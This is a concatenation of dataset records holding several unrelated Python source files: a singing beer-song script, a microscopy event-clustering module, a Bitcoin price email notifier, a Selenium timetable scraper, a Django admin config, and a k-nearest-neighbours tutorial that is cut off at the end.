open(\"done.txt\",\"r+\")\r\n file.write(linhas[numero] + \"\\n\")\r\n file.close()\r\n remover(numero)\r\n\r\nlistar()","sub_path":"Agenda.py","file_name":"Agenda.py","file_ext":"py","file_size_in_byte":17681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"497043033","text":"'''\nAn improved version of beersong.py.\nThis version does not display the lyics, but will sing the song.\n\nIn beersong1 use of os.system('say ...') causes the program to be uninterruptable.\nThis issue was resolved by replaced os.system('say ...') with a method from the subprocess module.\n\nThis is the karaoke edition, if prints the lyrics so you can sing along.\nBecause of the speak function, this script is macOS only.\n'''\n\nfrom sys import platform\t#Determine os.\nimport os\t\t\t\t\t#Used to find the length of terminal window.\nimport subprocess\t\t\t#Allows computer to talks out loud.\n\n#Determine os and define speak appropriately.\n#Speak also prints words to terminal window.\nif platform == 'darwin':\n\tlength = int(os.popen('stty size', 'r').read().split()[1]) #Length of terminal window.\n\tclear = \" \" * (length - 1)\t#Used to clear line text.\n\trate = 275 #Rate of speech\n\tdef speak(words):\n\t\tprint(\"\\r\" + clear, end=\"\")\n\t\tprint(\"\\r\\t{}\".format(words), end=' ')\n\t\tprint(u\"\\U0001F37B\") #Print Unicode Beer mug.\n\t\tsubprocess.run(['say', '-r {}'.format(rate), '{}'.format(words)]) #Allow user to interrupt the song.\nelse:\n\tprint(\"Sorry, this script will only run on macOS.\")\n\texit()\n\n#Suppress tracebacks.\ntry:\n\tprint()\n\tprint(\"\\tStop the code with Ctrl + C\\n\")\n\t#Start Singing\n\t##Choose bottle or bottles\n\tbottle_or_bottles = \" bottles\" #Extra space for formatting\n\tfor beer_num in range(99, 0, -1):\n\t\tbeer_num_string = str(beer_num) #Convert to string.\n\t\tspeak(beer_num_string + bottle_or_bottles + \" of beer on the wall\")\n\t\tspeak(beer_num_string + bottle_or_bottles + \" of beer\")\n\t\tspeak(\"Take one down\")\n\t\tspeak(\"Pass it around.\")\n\t\tif beer_num == 1: #Remember, we converted beer_num to a string.\n\t\t\tspeak(\"No more bottles of beer on the wall.\")\n\t\t\tprint()\n\t\telse:\n\t\t\tnew_num = beer_num - 1\n\t\t\tnew_num_string = str(new_num)\n\t\t\tif new_num == 1:\n\t\t\t\tbottle_or_bottles = \" bottle\" #Extra space for formatting.\n\t\t\tspeak(new_num_string + bottle_or_bottles + \" of beer on the wall.\")\n\t\t\tprint()\n\nexcept KeyboardInterrupt:\n\tend_message=\"Okay, I'll stop....\"\n\tspeak(end_message)\n","sub_path":"Head_First_Python/ Ch1_TheBasics/beersong2.py","file_name":"beersong2.py","file_ext":"py","file_size_in_byte":2067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19193551","text":"# Author: Meryll Dindin\n# Date: 10/26/2019\n# Project: ExoSpytosis\n\ntry: from package.utils import *\nexcept: from utils import *\n\n# Multiprocessing related wrappers\n\ndef mp_noiselevel(index, filename, percentile):\n \n with ND2Reader(filename) as fle: img = np.asarray(fle[index])\n return np.percentile(Frame(img).getBackground(), percentile)\n\ndef mp_get_frames(index, filename):\n \n with ND2Reader(filename) as fle: return Frame(np.asarray(fle[index])).img\n \ndef mp_extraction(index, filename, noise, background):\n \n with ND2Reader(filename) as fle: frm = Frame(np.asarray(fle[index]))\n x,y = np.where(frm.applyFilters(noise, background))\n return np.vstack((x, y, np.full(len(x), index))).T\n\n# General classes\n\nclass Frame:\n \n def __init__(self, image):\n \n self.img = np.clip(image, 0, 255) / 255.0\n self.dim = image.shape\n \n def getMasks(self, threshold=0.1):\n \n sig = estimate_sigma(self.img, average_sigmas=False, multichannel=False)\n blr = snd.gaussian_filter(self.img, sigma=sig)\n thr = threshold_otsu(blr)\n bry = (blr >= thr)\n new = binary_opening(bry)\n \n new = snd.morphology.binary_fill_holes(new)\n mat = np.array([[0, 0, 1, 1, 1, 0, 0],\n [0, 1, 1, 1, 1, 1, 0],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [0, 1, 1, 1, 1, 1, 0],\n [0, 0, 1, 1, 1, 0, 0]])\n msk = binary_dilation(new, selem=mat)\n \n warnings.simplefilter('ignore')\n msk = rank.mean(msk.astype('float'), selem=disk(16))\n out = np.where(msk > threshold, 0, 1).astype('bool')\n ins = np.where(msk <= threshold, 0, 1).astype('bool')\n\n # Memory efficiency\n del sig, blr, thr, bry, msk\n \n return ins, out\n \n def getBackground(self, threshold=0.1):\n \n # Retrieve the decomposition\n _,m = self.getMasks()\n # Apply the mask\n return self.img[m]\n \n def maskOnNoise(self, noise_level):\n \n return np.where(self.img < noise_level, 0, 1)\n \n def maskOnBackground(self, background):\n \n return np.where(self.img < background, 0, 1)\n \n def applyFilters(self, noise, background, threshold=0.1, sizes=(2,3,1,3)):\n\n # Look for the masks\n m,_ = self.getMasks(threshold=threshold)\n m_0 = self.maskOnNoise(noise)\n m_1 = self.maskOnBackground(background)\n \n # Override image\n self.img = (self.img*m*m_0*m_1 * 255.0).astype(np.uint8)\n \n # Post-process the results\n self.img = binary_dilation(self.img, selem=disk(sizes[0]))\n self.img = binary_erosion(self.img, selem=disk(sizes[1]))\n self.img = gaussian(self.img, sigma=sizes[2])\n self.img = binary_erosion(self.img, selem=disk(sizes[3]))\n \n return np.where(self.img > 1e-2, 1, 0).astype(np.uint8)\n\nclass Video:\n \n def __init__(self, filename, verbose=False, max_threads=cpu_count()):\n \n self.vrb = verbose\n self.pth = filename\n self.cpu = max_threads\n # Extract attributes\n with ND2Reader(self.pth) as fle:\n self.cnt = fle.metadata['num_frames']\n self.rte = fle.metadata['experiment']['loops'][0]['sampling_interval']\n \n # Run the initialization\n self._estimate_noiselevel()\n self._estimate_background()\n\n def _estimate_noiselevel(self, pad=50, percentile=99):\n \n t_0 = time.time()\n fun = partial(mp_noiselevel, filename=self.pth, percentile=percentile)\n\n if self.cpu == 1:\n res = np.asarray([fun(idx) for idx in np.arange(0, self.cnt, pad)])\n else:\n with Pool(processes=self.cpu) as pol:\n res = np.asarray(pol.map(fun, np.arange(0, self.cnt, pad)))\n pol.close()\n \n self.lvl = np.mean(res)\n\n if self.vrb: print('# Noise level extracted in {} seconds'.format(np.round(time.time()-t_0, 3)))\n \n # Memory efficiency\n del fun, res\n if self.cpu > 1: # delete pol only if more than one thread used\n del pol\n \n def _estimate_background(self, frames=(1000, 3000, 10), percentile=90):\n\n t_0 = time.time()\n fun = partial(mp_get_frames, filename=self.pth)\n\n if self.cpu == 1:\n res = [fun(idx) for idx in np.arange(*frames)]\n else:\n with Pool(processes=self.cpu) as pol:\n res = pol.map(fun, np.arange(*frames))\n pol.close()\n \n warnings.simplefilter('ignore')\n self.bkg = np.percentile(res, percentile, axis=0)\n m_x = self.bkg.max()\n self.bkg = rank.mean(self.bkg, selem=disk(10)) / 255.0\n self.bkg = self.bkg * (m_x / self.bkg.max())\n\n if self.vrb: print('# Static background estimated in {} seconds'.format(np.round(time.time()-t_0, 3)))\n \n # Memory efficiency\n del fun, res\n if self.cpu > 1: # delete pol only if more than one thread used\n del pol\n \n def visualizeFiltering(self, index, threshold=0.1):\n \n with ND2Reader(self.pth) as fle: frm = Frame(np.asarray(fle[index]))\n \n # Retrieve the decomposition\n _,m = frm.getMasks(threshold=threshold)\n m_0 = frm.maskOnNoise(self.lvl)\n m_1 = frm.maskOnBackground(self.bkg)\n \n arg = {'vmin': 0, 'vmax': 1}\n \n plt.figure(figsize=(18,4))\n plt.subplot(1,5,1)\n plt.title('Initial Image')\n plt.imshow(frm.img, **arg)\n plt.xticks([])\n plt.yticks([])\n plt.subplot(1,5,2)\n plt.title('Estimate Contours')\n plt.imshow(m, **arg)\n plt.xticks([])\n plt.yticks([])\n plt.subplot(1,5,3)\n plt.title('Noise Thresholding')\n plt.imshow(m_0, **arg)\n plt.xticks([])\n plt.yticks([])\n plt.subplot(1,5,4)\n plt.title('Background Thresholding')\n plt.imshow(m_1, **arg)\n plt.xticks([])\n plt.yticks([])\n plt.subplot(1,5,5)\n plt.title('Post-processed Masks')\n plt.imshow(frm.applyFilters(self.lvl, self.bkg), **arg)\n plt.xticks([])\n plt.yticks([])\n plt.tight_layout()\n plt.show()\n \n def process(self, max_distance=3):\n \n t_0 = time.time()\n fun = partial(mp_extraction, filename=self.pth, noise=self.lvl, background=self.bkg)\n \n if self.cpu == 1:\n res = [fun(idx) for idx in np.arange(self.cnt)]\n else:\n with Pool(processes=self.cpu) as pol:\n res = pol.map(fun, np.arange(self.cnt))\n pol.close()\n pts = np.vstack(res)\n\n if self.vrb: print('# Points of interest extracted in {} seconds'.format(np.round(time.time()-t_0, 3)))\n t_0 = time.time()\n \n # Run density-based clustering\n cls = DBSCAN(eps=max_distance, n_jobs=self.cpu).fit_predict(pts)\n\n if self.vrb: print('# Event clustering in {} seconds'.format(np.round(time.time()-t_0, 3)))\n \n # First event estimation\n list_events = [] \n for crd in np.unique(cls):\n list_points = [Point(*c) for c in pts[np.where(cls == crd)[0],:]]\n list_events.append(Event(list_points, crd))\n \n # Memory efficiency\n del fun, res, pts, cls\n if self.cpu > 1: # delete pol only if more than one thread used\n del pol\n \n return list_events\n\nclass Point:\n \n def __init__(self, x, y, z):\n \n self.x = x\n self.y = y\n self.z = z\n \n def distance(self, point):\n \n return np.sqrt((point.x - self.x)**2 + (point.y - self.y)**2) + np.abs(point.z - self.z)\n \nclass Event:\n \n def __init__(self, points, roi):\n \n self.roi = roi\n self.pts = points\n \n def distance(self, event):\n \n dis = []\n for point in self.pts:\n dis.append(np.min([pts.distance(point) for pts in self.pts]))\n return np.min(dis)\n \n def fusion(self, event):\n \n self.pts += event.pts\n \n def getPoints(self):\n \n try: return np.vstack([[p.x, p.y, p.z, self.roi] for p in self.pts])\n except: return None\n \n def duration(self):\n \n dur = [point.z for point in self.pts]\n return np.max(dur) + 1 - np.min(dur) \n \n def getAreaVolume(self):\n \n slc = np.vstack([[p.x, p.y, p.z] for p in self.pts])\n \n if len(np.unique(slc[:,2])) == 1: \n ull = ConvexHull(points=slc[:,:2])\n else: \n ull = ConvexHull(points=slc[:,:])\n \n return (ull.area, ull.volume)\n \n def focus(self):\n \n disk_points = []\n mat = self.getPoints()\n \n x = int(np.round(np.median(mat[:,0])))\n y = int(np.round(np.median(mat[:,1])))\n self.cen = (x, y)\n\n for u_z in np.unique(mat[:,2]):\n u,v = np.meshgrid(np.arange(x-2, x+3), np.arange(y-2, y+3))\n m_z = np.full(len(u), u_z).reshape(-1,1)\n for u_x in u:\n for u_y in v: \n disk_points += list(np.hstack((u_x.reshape(-1,1), u_y.reshape(-1,1), m_z)))\n\n self.pts = [Point(*p) for p in disk_points]\n\nclass EventManager:\n \n def __init__(self, events):\n \n self.evt = events\n \n def filterAreaVolume(self, min_area=10, min_volume=10):\n \n list_evt = []\n for event in self.evt: \n a,v = event.getAreaVolume()\n if (a > min_area) and (v > min_volume): list_evt.append(event)\n self.evt = list_evt\n \n def focusAreas(self):\n \n for event in self.evt: event.focus()\n \n def display(self):\n \n points = np.vstack([e.getPoints() for e in self.evt if len(e.pts) > 0])\n \n x,y,z = points[:,0], points[:,1], points[:,2]\n arg = {'mode': 'markers', 'marker': dict(size=3, color=points[:,3])}\n fig = go.Figure(data=[go.Scatter3d(x=x, y=y, z=z, **arg)])\n fig.update_layout(margin=dict(l=0, r=0, b=0, t=0))\n fig.show()\n \n def getEventContours(self,out=True):\n '''\n Get the max & min values of x, y, z for each event and store in numpy\n array\n \n If out is set to \"True\", return the event countours\n '''\n Res = np.zeros((len(self.evt),6),dtype=np.int_)\n Res = pd.DataFrame(Res,columns = ['x_min','x_max','y_min','y_max','z_min','z_max'])\n for idx in range(len(self.evt)):\n e = self.evt[idx]\n Pts = e.getPoints()\n Res.loc[idx,['x_min','y_min','z_min']] = np.amin(Pts[:,:-1],axis=0)\n Res.loc[idx,['x_max','y_max','z_max']] = np.amax(Pts[:,:-1],axis=0)\n self.Contours = Res\n if out:\n return Res\n \n def MapROI(self,ROI,x_err=5,y_err=5,z_err=9):\n '''\n Map a given ROI to its corresponding event using the following criteria:\n \n Spatially event should not be more than 5 pixels off from ROI\n Temporally event should not be more than 10 frames off from ROI\n \n Criteria can be altered by changing the values of x_err, y_err, & z_err\n \n Arguments:\n ROI: ROI object containing x, y, z, width, & length info\n x_err,y_err,z_err: int, the error tolerance (pixels for x_err, y_err, frames for z_err)\n \n Returns:\n numpy array containing the event roi index, empty if no \n corresponding event found.\n '''\n try:\n Cntrs = self.Contours\n except:\n Cntrs = self.getEventContours()\n I_x = ~((Cntrs['x_max'] < ROI.x-x_err) | (Cntrs['x_min'] > ROI.x+ROI.w+x_err))\n I_y = ~((Cntrs['y_max'] < ROI.y-y_err) | (Cntrs['y_min'] > ROI.y+ROI.h+y_err))\n I_z = ~((Cntrs['z_max'] < ROI.z-z_err) | (Cntrs['z_min'] > ROI.z+z_err))\n IDX = I_x & I_y & I_z\n return np.where(IDX)[0]\n \n def MapROIs(self,RS,*args,**kwargs):\n '''\n Map a given set of ROIs to their corresponding events\n \n Arguments:\n RS: ROISet object\n *args, **kwargs will be passed to MapROI method\n \n Returns:\n dictionary with ROI names as keys\n '''\n ans = {}\n for idx in range(RS.size):\n r = RS.ROIs[idx]\n name = RS.ROI_list.iloc[idx]\n ans[name] = self.MapROI(r,*args,**kwargs)\n return ans\n \nclass ROI(object):\n def __init__(self,bx,by,width,height,z,pixel_res=1):\n '''\n bx: horizontal coordinate of the top left corner\n by: vertical coordinate of the top left corner\n width: horizontal length of the ROI box\n height: vertical length of the ROI box\n z: Slice\n pixel_res: float. factor to convert units into pixel number\n '''\n # Invert the x and y axes so as to be compatible with numpy indexing\n self.x = round(by/pixel_res)\n self.y = round(bx/pixel_res)\n self.h = round(width/pixel_res)\n self.w = round(height/pixel_res)\n self.z = int(z)\n \n \nclass ROISet(object):\n def __init__(self,path,pixel_res=1):\n '''\n path: str, specifies a .csv files with ROI information\n pixel_res: float. Unit per pixel conversion factor if ROIs are not\n specified in pixels\n '''\n df = pd.read_csv(path,index_col=0)\n # Infer ROI names\n ind = df.index.copy().astype(str)\n ind = ind.str.rjust(3,'0')\n self.ROI_list = pd.Series('ROI' + ind,index=df.index) # Store the list of ROIs\n # Get total number of ROIs in set\n self.size = ind.size\n # Create separate ROI obejct for each element in set\n ls = []\n for idx in range(self.size):\n params = df.iloc[idx][['BX','BY','Width','Height','Slice']]\n roi = ROI(*params,pixel_res)\n ls.append(roi)\n self.ROIs = ls","sub_path":"package/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":14329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"250990018","text":"h_list = [None] * 26\nprint(h_list)\n\ndef my_append(value):\n index = ord(value[0]) - ord('a')\n h_list[index] = value\n print(h_list)\n\na = 'apricot'\nmy_append(a)\n\nb = 'banana'\nmy_append(b)\n\nc = 'apple'\nmy_append(c) # хеш-коллизия\n\ndef my_index(value): # простейшая хеш-функция\n letter = 26\n index = 0\n size = 10000\n\n for i, char in enumerate(value):\n index += (ord(char) - ord('a') +1) * letter ** i\n\n return index % size\n\nprint(my_index(a))\nprint(my_index(b))\nprint(my_index(c))","sub_path":"lesson_9/lesson_9_theory_hash.py","file_name":"lesson_9_theory_hash.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546155028","text":"from setuptools import setup\nfrom setuptools import find_packages\n\nREQUIRED_PYTHON = (3, 1)\n\nsetup(name='Fitv',\n version='0.1.0',\n python_requires='>={}.{}'.format(*REQUIRED_PYTHON),\n description='Optimizing UI Test Automation',\n long_description=open('README.md').read(),\n url='https://github.com/jcomish/Fitv',\n author='Joshua Comish',\n author_email='jcomish@sourceiron.com',\n license='Apache 2.0',\n keywords='automation qa selenium',\n packages=['Fitv', 'Fitv/Assertions', 'Fitv/Exceptions', 'Fitv/FitActions', 'Fitv/FitActions/Basic',\n 'Fitv/FitActions/Basic/Mobile', 'Fitv/FitActions/Basic/Web'],\n # packages=find_packages(include=['Fitv', 'Assertions', 'Drivers', 'Exceptions', 'FitActions'], exclude=['Fitv.FitPage', ]),\n install_requires=['behave>=1.2.6',\n 'selenium>=3.12.0',\n 'requests>=1.0.2'])\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"602271152","text":"from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom .models import Profile\nfrom .forms import ProfileCreationForm\n\n\ndef deactivate(modeladmin, request, queryset):\n queryset.update(is_active=True)\ndeactivate.short_description = \"Deactivate selected users\"\n\n\nclass ProfileAdmin(UserAdmin):\n add_form = ProfileCreationForm\n\n date_hierarchy = 'date_joined'\n list_filter = ('is_staff', 'is_superuser', 'is_active', 'groups', 'date_joined')\n list_display = ('username', 'display_name', 'first_name', 'last_name', 'email', 'is_active', 'is_staff')\n search_fields = ('username', 'first_name', 'last_name', 'email', 'display_name')\n actions = [deactivate, ]\n\n\n def get_form(self, request, obj=None, **kwargs):\n \"\"\"\n Use special form during user creation\n \"\"\"\n defaults = {}\n if obj is None:\n defaults['form'] = self.add_form\n defaults.update(kwargs)\n return super(ProfileAdmin, self).get_form(request, obj, **defaults)\n\nadmin.site.register(Profile, ProfileAdmin)\n","sub_path":"tango_user/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"55203159","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport smtplib\nimport pytz\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom datetime import datetime\nfrom itertools import chain\nfrom urllib import request\n\nfrom con import foxbit, contact\n\n\ndef save_foxbit():\n url = 'https://api.blinktrade.com/api/v1/BRL/ticker?crypto_currency=BTC'\n resp = request.urlopen(url).read()\n data = json.loads(resp.decode('utf-8'))\n data['timestamp'] = datetime.now(pytz.timezone('America/Sao_Paulo'))\n last_data = foxbit.find().sort('timestamp', -1)\n if last_data.count() > 0:\n last_data = last_data[0]\n if last_data['last'] != data['last']:\n foxbit.insert_one(data)\n send_notification(data)\n else:\n foxbit.insert_one(data)\n send_notification(data)\n\n\ndef save_contact(data):\n contact.insert_one(data)\n\n\ndef send_notification(data):\n all_contacts = getting_contacts_notification(data)\n username = os.environ.get('MANDRILL_USERNAME', None)\n password = os.environ.get('MANDRILL_PASSWORD', None)\n if username and password:\n smtp = smtplib.SMTP('smtp.mandrillapp.com', 587)\n smtp.login(username, password)\n else:\n smtp = None\n\n for item in all_contacts:\n msg = MIMEMultipart('alternative')\n msg['Subject'] = 'Bitcoins Notification'\n msg['From'] = 'Bitcoins Notification '\n msg['To'] = item['email']\n\n if contact['rules'] == 'menor':\n above_below = 'abaixo'\n else:\n above_below = 'acima'\n\n text = 'Atenção! O valor do Bitcion está {above_below} de R$ {value}, o Bitcoin está valendo R$ {last}.'\n text = text.format(\n above_below=above_below, value=item['value'], last=data['last'])\n part = MIMEText(text, 'plain')\n if smtp:\n msg.attach(part)\n smtp.sendmail(msg['From'], msg['To'], msg.as_string())\n else:\n # Is running local\n print(text)\n print(msg['From'])\n print(msg['To'])\n contact.update_one({'_id': item['_id']}, {'$set': {'sent': True}})\n if smtp:\n smtp.quit()\n\n\ndef getting_contacts_notification(data):\n lower_than = contact.find({\n 'rules': 'menor',\n 'sent': False,\n 'value': {'$gt': data['last']}\n })\n upper_than = contact.find({\n 'rules': 'maior',\n 'sent': False,\n 'value': {'$lt': data['last']}\n })\n\n if lower_than and upper_than:\n all_contacts = [i for i in chain(lower_than, upper_than)]\n elif lower_than and not upper_than:\n all_contacts = lower_than\n elif not lower_than and upper_than:\n all_contacts = upper_than\n\n return all_contacts\n","sub_path":"actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424135729","text":"\r\ndef scrap(album_num):\r\n\r\n from selenium import webdriver\r\n from selenium.common.exceptions import TimeoutException\r\n from selenium.webdriver.common.by import By\r\n from selenium.webdriver.support import expected_conditions as EC\r\n from selenium.webdriver.support.wait import WebDriverWait\r\n from selenium.webdriver.chrome.options import Options\r\n import csv\r\n import re\r\n import requests\r\n import time\r\n import os\r\n from bs4 import BeautifulSoup\r\n\r\n URL = 'https://estudent.wsei.edu.pl/SG/PublicDesktop.aspx?fileShareToken=95-88-6B-EB-B0-75-96-FB-A9-7C-AE-D7-5C-DB-90-49'\r\n\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--headless\")\r\n chrome_options.add_argument(\"--window-size=1920x1080\")\r\n driver_path = '/usr/lib/chromium-browser/chromedriver'\r\n driver = webdriver.Chrome(options=chrome_options,\r\n executable_path=driver_path)\r\n\r\n driver.get(URL)\r\n time.sleep(6)\r\n driver.execute_script(\r\n \"var p = document.createElement('p');p.id='albumNum';p.innerText=arguments[0];document.body.appendChild(p);\", album_num)\r\n driver.execute_script(open('./simulateActions.js').read())\r\n time.sleep(6)\r\n html = driver.page_source\r\n soup = BeautifulSoup(html, 'html.parser')\r\n\r\n grid_row = soup.find_all(class_='grid-row')\r\n grid_row_alternating = soup.find_all(class_='grid-row-alternating')\r\n\r\n grid_rows_combined = []\r\n for a, b in zip(grid_row_alternating, grid_row):\r\n grid_rows_combined.append(a)\r\n grid_rows_combined.append(b)\r\n\r\n classes = []\r\n for item in grid_rows_combined:\r\n tdTag = item.find_all('td')\r\n temp = []\r\n for tag in tdTag:\r\n temp.append(tag.text)\r\n\r\n date = temp[1]\r\n day = temp[2]\r\n start = temp[3]\r\n end = temp[4]\r\n hours = temp[5]\r\n subject = temp[6]\r\n classrom = temp[7]\r\n lecturer = temp[8]\r\n classID = temp[9]\r\n classes.append([date, day, start, end, hours,\r\n subject, classrom, lecturer, classID])\r\n temp = []\r\n\r\n if not os.path.exists(f'../data/{album_num}'):\r\n os.makedirs(f'../data/{album_num}')\r\n\r\n with open(f'../data/{album_num}/Classes{album_num}.csv', 'w', newline='', encoding='UTF-8') as fp:\r\n a = csv.writer(fp, delimiter=',')\r\n data = [['Date', 'Day', 'Start', 'End', 'Hours',\r\n 'Subject', 'Classrom', 'Lecturer', 'ClassID'], *classes]\r\n a.writerows(data)\r\n","sub_path":"flask/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"526501491","text":"import random, os, glob, shutil\n\n# Config variables\ntrain_test_ratio = 0.9\ntrain_val_ratio = 0.2\nbase_directory = './images/raw/DR'\n\n# Make train, test directories\ntrain_directory = base_directory + '/train'\nval_directory = base_directory + '/val'\ntest_directory = base_directory + '/test'\nif not os.path.exists(train_directory):\n\tos.makedirs(train_directory)\nif not os.path.exists(val_directory):\n\tos.makedirs(val_directory)\nif not os.path.exists(test_directory):\n\tos.makedirs(test_directory)\n\nfiles = glob.glob(base_directory + '/*.mat')\nrandom.shuffle(files)\n\ntrain_size = int(train_test_ratio * len(files))\n\ntrain_files = files[:train_size]\ntest_files = files[train_size:]\n\nval_size = int(train_val_ratio * len(train_files))\nval_files = train_files[:val_size]\ntrain_files = train_files[val_size:]\n\nfor f in train_files:\n\tshutil.move(f, train_directory)\nfor f in val_files:\n\tshutil.move(f, val_directory)\nfor f in test_files:\n\tshutil.move(f, test_directory)","sub_path":"split_train_test.py","file_name":"split_train_test.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"438837997","text":"from numpy import array, tile, zeros, shape\r\nimport operator\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n'''\r\n@function: 随便创建一组简单的数组进行演示\r\n'''\r\n\r\n\r\ndef create_dataset():\r\n group = array([[1.0, 1.1], [1.0, 1.0], [0.0, 0.0], [0.0, 0.1]])\r\n labels = ['A', 'A', 'B', 'B']\r\n return group, labels\r\n\r\n\r\n'''\r\n@function: knn分类器实现\r\n@params:\r\ninx: 需进行分类的样本\r\ndataset: 提供的数据集\r\nlabels: 提供的数据集的标签\r\nk: 取样本的前k个\r\n'''\r\n\r\n\r\ndef knn(inx, dataset, labels, k):\r\n dataset_size = dataset.shape[0] # 表示里面有多少个点\r\n diff_mat = tile(inx, (dataset_size, 1)) - dataset # 在行列上重复该点并相减\r\n distances_mat = (diff_mat ** 2).sum(axis=1) # 得到每个点的距离只\r\n distances_mat = distances_mat ** 0.5\r\n sorted_dist_indices = distances_mat.argsort() # 将距离值排序,返回索引值\r\n class_count = {} # 得到前k个点中每个类别出现的次数\r\n for i in range(k):\r\n vote_label = labels[sorted_dist_indices[i]]\r\n # 字典中的get函数返回该键对应的值, 默认值为第二个参数\r\n class_count[vote_label] = class_count.get(vote_label, 0) + 1\r\n # 字典中的items函数返回包含所有键值对的元组,返回值是一个列表\r\n sorted_class_count = sorted(class_count.items(),\r\n key=operator.itemgetter(1), reverse=True)\r\n return sorted_class_count[0][0]\r\n\r\n\r\n'''\r\n@function: 将文件内容读取为矩阵形式\r\n文件内容包括:\r\n每年获得的飞行常客里程数\r\n玩视频游戏所消耗游戏百分比\r\n每周消费的冰淇淋公升数\r\n喜欢程度\r\n'''\r\n\r\n\r\ndef file2matrix(filename):\r\n fr = open(filename)\r\n lines = fr.readlines()\r\n num_lines = len(lines)\r\n data = zeros((num_lines, 3)) # 数据矩阵\r\n labels = [] # 标签\r\n str_labels = [\"didn't like\", \"small doses\", \"large doses\"]\r\n index = 0\r\n for line in lines:\r\n line = line.strip() # 去掉行的首尾字符,默认为空格\r\n list_line = line.split('\\t') # 以\\t符号分割得到四个值\r\n data[index, :] = list_line[0:3] # 取前三个值放入数据矩阵中\r\n labels.append(str_labels[int(list_line[-1])-1]) # 将最后一个标签值放去标签列表中\r\n index += 1\r\n return data, labels # 返回数据矩阵和标签值\r\n\r\n\r\n'''\r\n@function: 归一化数据\r\n'''\r\n\r\n\r\ndef auto_norm(data):\r\n min_value = data.min(0) # 取每一列的最小值\r\n max_value = data.max(0) # 同上\r\n num_ranges = max_value - min_value\r\n norm_data = zeros(shape(data))\r\n m = data.shape[0]\r\n norm_data = data - tile(min_value, (m, 1))\r\n norm_data = norm_data / tile(num_ranges, (m, 1))\r\n return norm_data, num_ranges, min_value\r\n\r\n\r\n'''\r\n@function: 测试分类器\r\n'''\r\n\r\n\r\ndef class_test(data, labels, ho_ratio):\r\n norm_data, num_ranges, min_value = auto_norm(data)\r\n m = norm_data.shape[0]\r\n num_tests = int(m * ho_ratio) # 用来作测试的样本数\r\n error_count = 0.0\r\n for i in range(num_tests):\r\n classifier_result = knn(norm_data[i, :],\r\n norm_data[num_tests:m, :],\r\n labels[num_tests:m], 3)\r\n # print('the classifier came back with: %s, the real answer is : %s'\r\n # % (classifier_result, labels[i]))\r\n if classifier_result is not labels[i]:\r\n error_count += 1.0\r\n # print('the total error rate is: %f' % (error_count / float(num_tests)))\r\n return error_count / float(num_tests)\r\n\r\n\r\n'''\r\n@function: 预测\r\n'''\r\n\r\n\r\ndef classify_person(data, labels, flying_miles, playing_games_per, icecream_consume):\r\n # flying_miles = float(input(\"每年获得的飞行常客里程数: \"))\r\n # playing_games_per = float(input(\"玩视频游戏所消耗游戏百分比: \"))\r\n # icecream_consume = float(input(\"每周消费的冰淇淋公升数: \"))\r\n norm_data, num_ranges, min_value = auto_norm(data)\r\n person = array([flying_miles, playing_games_per, icecream_consume])\r\n classifier_result = knn((person - min_value) /\r\n num_ranges, norm_data, labels, 3)\r\n # print('您对这位先生的喜好程度大致为:', classifier_result)\r\n return classifier_result\r\n\r\n\r\ndef draw_data(data, labels):\r\n plt.rcParams['font.sans-serif'] = ['Simhei']\r\n plt.rcParams['axes.unicode_minus'] = False\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111)\r\n # ax.scatter(data_mat[:, 0], data_mat[:, 1],\r\n # 10.0 * array(class_labels), 10.0 * array(class_labels))\r\n type1_x, type1_y = [], []\r\n type2_x, type2_y = [], []\r\n type3_x, type3_y = [], []\r\n for i in range(len(labels)):\r\n if labels[i] is 1:\r\n type1_x.append(data[i][0])\r\n type1_y.append(data[i][1])\r\n if labels[i] is 2:\r\n type2_x.append(data[i][0])\r\n type2_y.append(data[i][1])\r\n if labels[i] is 3:\r\n type3_x.append(data[i][0])\r\n type3_y.append(data[i][1])\r\n type1 = ax.scatter(type1_x, type1_y, s=10, c='r')\r\n type2 = ax.scatter(type2_x, type2_y, s=10, c='g')\r\n type3 = ax.scatter(type3_x, type3_y, s=10, c='b')\r\n plt.legend((type1, type2, type3),\r\n ('didntLike', 'smallDoses', 'largeDoses'))\r\n plt.show()\r\n\r\n\r\n'''\r\n@function: 将图片转化为向量格式\r\n'''\r\n\r\n\r\ndef img2vector(filename):\r\n returnvect = zeros((1, 1024))\r\n fr = open(filename)\r\n for i in range(32):\r\n linestr = fr.readline()\r\n for j in range(32):\r\n returnvect[0, 32*i+j] = int(linestr[j])\r\n return returnvect\r\n\r\n\r\n'''\r\n@function: 手写数字识别系统的测试代码\r\n'''\r\n\r\n\r\ndef handwriting_class_test():\r\n\thwlabels = []\r\n\ttrainingfile_list = os.listdir('digits/trainingDigits/')\r\n\tm = len(trainingfile_list) # 表示里面总共有多少个文件\r\n\ttraining_mat = zeros((m, 1024))\r\n\tfor i in range(m):\r\n\t\tfilename_str = 